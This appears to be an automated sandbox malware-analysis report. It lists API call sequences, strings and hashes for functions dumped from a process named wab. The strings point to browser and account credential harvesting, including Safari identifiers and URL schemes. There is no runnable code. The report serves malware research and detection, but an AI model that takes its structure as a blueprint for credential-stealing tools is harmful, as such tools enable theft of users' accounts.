                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                  APIs
                  • memset.MSVCRT ref: 004095FC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                    • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                  • String ID:
                  • API String ID: 3655998216-0
                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                  APIs
                  • memset.MSVCRT ref: 00445426
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                  • String ID:
                  • API String ID: 1828521557-0
                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                  APIs
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                  • memcpy.MSVCRT ref: 00406942
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@FilePointermemcpy
                  • String ID:
                  • API String ID: 609303285-0
                  • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                  • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                  APIs
                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$CloseCreateErrorHandleLastRead
                  • String ID:
                  • API String ID: 2136311172-0
                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                  APIs
                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@
                  • String ID:
                  • API String ID: 1936579350-0
                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                  APIs
                  • EmptyClipboard.USER32 ref: 004098EC
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                  • GlobalFix.KERNEL32(00000000), ref: 00409927
                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                  • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                  • GetLastError.KERNEL32 ref: 0040995D
                  • CloseHandle.KERNEL32(?), ref: 00409969
                  • GetLastError.KERNEL32 ref: 00409974
                  • CloseClipboard.USER32 ref: 0040997D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                  • String ID:
                  • API String ID: 2565263379-0
                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                  APIs
                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadMessageProc
                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                  • API String ID: 2780580303-317687271
                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                  APIs
                  • EmptyClipboard.USER32 ref: 00409882
                  • wcslen.MSVCRT ref: 0040988F
                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                  • GlobalFix.KERNEL32(00000000), ref: 004098AC
                  • memcpy.MSVCRT ref: 004098B5
                  • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                  • CloseClipboard.USER32 ref: 004098D7
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                  • String ID:
                  • API String ID: 2014503067-0
                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                  APIs
                  • GetLastError.KERNEL32 ref: 004182D7
                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                  • LocalFree.KERNEL32(?), ref: 00418342
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                  • String ID: OsError 0x%x (%u)
                  • API String ID: 403622227-2664311388
                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                  APIs
                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                  • OpenClipboard.USER32(?), ref: 00411878
                  • GetLastError.KERNEL32 ref: 0041188D
                  • DeleteFileW.KERNEL32(?), ref: 004118AC
                    • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                    • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                    • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                    • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                    • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                    • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                    • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                    • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                    • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                  • String ID:
                  • API String ID: 1203541146-0
                  • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                  • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                  • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                  • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID:
                  • API String ID: 1865533344-0
                  • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                  • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                  • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                  • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                  • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                  APIs
                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: NtdllProc_Window
                  • String ID:
                  • API String ID: 4255912815-0
                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                  APIs
                  • _wcsicmp.MSVCRT ref: 004022A6
                  • _wcsicmp.MSVCRT ref: 004022D7
                  • _wcsicmp.MSVCRT ref: 00402305
                  • _wcsicmp.MSVCRT ref: 00402333
                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                  • memset.MSVCRT ref: 0040265F
                  • memcpy.MSVCRT ref: 0040269B
                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                  • memcpy.MSVCRT ref: 004026FF
                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                  • API String ID: 577499730-1134094380
                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                  • String ID: :stringdata$ftp://$http://$https://
                  • API String ID: 2787044678-1921111777
                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                  • GetWindowRect.USER32(?,?), ref: 00414088
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                  • GetDC.USER32 ref: 004140E3
                  • wcslen.MSVCRT ref: 00414123
                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                  • ReleaseDC.USER32(?,?), ref: 00414181
                  • _snwprintf.MSVCRT ref: 00414244
                  • SetWindowTextW.USER32(?,?), ref: 00414258
                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                  • GetClientRect.USER32(?,?), ref: 004142E1
                  • GetWindowRect.USER32(?,?), ref: 004142EB
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                  • GetClientRect.USER32(?,?), ref: 0041433B
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                  • String ID: %s:$EDIT$STATIC
                  • API String ID: 2080319088-3046471546
                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                  APIs
                  • EndDialog.USER32(?,?), ref: 00413221
                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                  • memset.MSVCRT ref: 00413292
                  • memset.MSVCRT ref: 004132B4
                  • memset.MSVCRT ref: 004132CD
                  • memset.MSVCRT ref: 004132E1
                  • memset.MSVCRT ref: 004132FB
                  • memset.MSVCRT ref: 00413310
                  • GetCurrentProcess.KERNEL32 ref: 00413318
                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                  • memset.MSVCRT ref: 004133C0
                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                  • memcpy.MSVCRT ref: 004133FC
                  • wcscpy.MSVCRT ref: 0041341F
                  • _snwprintf.MSVCRT ref: 0041348E
                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                  • SetFocus.USER32(00000000), ref: 004134B7
                  Strings
                  • {Unknown}, xrefs: 004132A6
                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                  • API String ID: 4111938811-1819279800
                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                  APIs
                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                  • EndDialog.USER32(?,?), ref: 0040135E
                  • DeleteObject.GDI32(?), ref: 0040136A
                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                  • ShowWindow.USER32(00000000), ref: 00401398
                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                  • ShowWindow.USER32(00000000), ref: 004013A7
                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                  • String ID:
                  • API String ID: 829165378-0
                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                  APIs
                  • memset.MSVCRT ref: 00404172
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  • wcscpy.MSVCRT ref: 004041D6
